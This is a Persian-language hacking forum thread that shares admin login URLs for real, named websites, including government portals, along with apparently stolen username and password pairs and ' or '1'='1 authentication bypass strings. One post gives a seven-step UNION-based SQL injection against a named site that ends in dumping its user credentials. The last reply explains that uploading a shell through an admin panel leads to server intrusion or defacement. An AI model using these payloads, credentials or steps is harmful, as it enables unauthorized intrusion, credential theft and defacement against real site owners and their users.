Login Admin Page

RE: Login Admin Page

لطف كنيد از سايت هاي ديگه copy نكنيد و شل هاي خودتون رو قرار بدين

RE: Login Admin Page

http://www.ultimatedecals.com/admin/
randyman:sebestar
beedot:caesarb
dbloh:B1gd@v3
bwalthen:walthen2

RE: Login Admin Page

http://www.lynton-exports.co.uk/admin.asp

' or '1'='1
' or '1'='1

RE: Login Admin Page

http://www.southern-suzuki.com/admin

' or '1'='1
' or '1'='1

RE: Login Admin Page

اینم از منبع و تارگت های زیاد دیگه ای !
http://www.msn.x10.mx/sqli.txt

RE: Login Admin Page

از جه متدی استفاده کردین

RE: Login Admin Page

مرحله ي اول: تست آسيب پذيري:
[PHP]
http://www.ultimatedecals.com/subcat.php?cat=30'
[/PHP]
مرحله ي دوم: پيدا كردن تعداد ستون ها:
[PHP]
http://www.ultimatedecals.com/subcat.php?cat=30+order+by+5-- --->Error
http://www.ultimatedecals.com/subcat.php?cat=30+order+by+4-- --->Not Error
[/PHP]
مرحله ي سوم: پيدا كردن ستون آسيب پذير:
[PHP]
http://www.ultimatedecals.com/subcat.php?cat=30+union+select+1,2,3,4--
[/PHP]
مرحله ي چهارم: پيدا كردن نسخه ي ديتابيس:
[PHP]
http://www.ultimatedecals.com/subcat.php?cat=30+union+select+1,2,version(),4--
[/PHP]
مرحله ي پنجم: پيدا كردن نام جداول:
[PHP]
http://www.ultimatedecals.com/subcat.php?cat=30+union+select+1,2,group_concat(ta ble_name),4+from+information_schema.tables+where+t able_schema=database()--
[/PHP]
مرحله ي ششم: به دست آوردن ستون هاي موجود در جدول useraccess:
ابتدا بايد نام جدول useraccess را با استفاده از نرم افزار Text To Hex به معادل هگزادسيمال تبديل كنيم يا با استفاده از MySql Char موجود در افزونه ي Hackbar فايرفاكس (قسمت Sql و سپس MySql) آن را به معادل Char تبديل كنيم.
1- تبديل useraccess به هگزادسيمال با استفاده از نرم افزار TEXT2HEX:
[PHP]
useraccess = 0x75736572616363657373
[/PHP]
2- تبديل useraccess به Char با استفاده از افزونه ي Hackbar:
[PHP]
useraccess = CHAR(117, 115, 101, 114, 97, 99, 99, 101, 115, 115)
[/PHP]
دستور به دست آوردن ستون ها:
[PHP]
http://www.ultimatedecals.com/subcat.php?cat=30+union+select+1,2,group_concat(co lumn_name),4+from+information_schema.columns+where +table_name=0x75736572616363657373--
[/PHP]
مرحله ي هفتم: به دست آوردن محتويات موجود در فيلدهاي uname و upass از جدول useraccess:
[PHP]
http://www.ultimatedecals.com/subcat.php?cat=30+union+select+1,2,group_concat(un ame,0x3a,upass),4+from+useraccess--
[/PHP]
به همين سادگي.
در پايان بگم كه ابتدا يوزرنيم نمايش داده شده سپس علامت ( و بعدش رمز عبور.
اكانت ها با استفاده از علامت (,) از هم جدا شده اند.
به عنوان نمونه:
[PHP]
beedot:caesarb,randyman:sebestar,dbloh:B1gd@v3,gbl oh:roadrunner,
[/PHP]
با تقديم احترام
صداقت

RE: Login Admin Page

Admin Page : http://www.ngcb.gov.pg/admin/

Username : admin

Password : admin

RE: Login Admin Page

http://schools.punjab.gov.pk/?q=monitoringcell
http://schoolportal.punjab.gov.pk/ActionTaken/login.asp
http://schoolportal.punjab.gov.pk/loginNew.asp
http://schoolportal.punjab.gov.pk/sc-funds/login.asp

admin

909090

RE: Login Admin Page

اینم mr.a!l عزیز شناسایی کرد :



user:admin
pass:N@ctEn@actE

RE: Login Admin Page

ییخشید من زیاد با این فروم اشنایی ندارم
با یوزر و پسی که دادید وارد پنل شدم
خب این الان چه چیزی هستش؟
میشه راهنمایی کنید؟
اخه قصد فعالیت در این انجمن رو دارم

RE: Login Admin Page

درود
همونطور که میدونید هر سایت یک قسمت مدیریت داره که مدیر سایت از اونجا سایت رو اداره و کنترل میکنه.
یوزر پس ها و آدرس هایی که اینجا گذاشته میشه در واقع آدرس و یوزر پس همون مدیریت سایت ها هستش.
در بعضی از ادمین پنل ها میشه بر روی سایت شل ریخت و در بعضی ها نمیشه.
که با آپلود شدن شل بر روی سایت باتوجه به مهارت نفوذگر و امنیت سرور، امکان نفوذ به سرور و یا دیفیس سایت وجود داره.
درضمن سؤالات این چنینی رو در این بخش بپرسید نه وسط تاپیک.
موفق باشید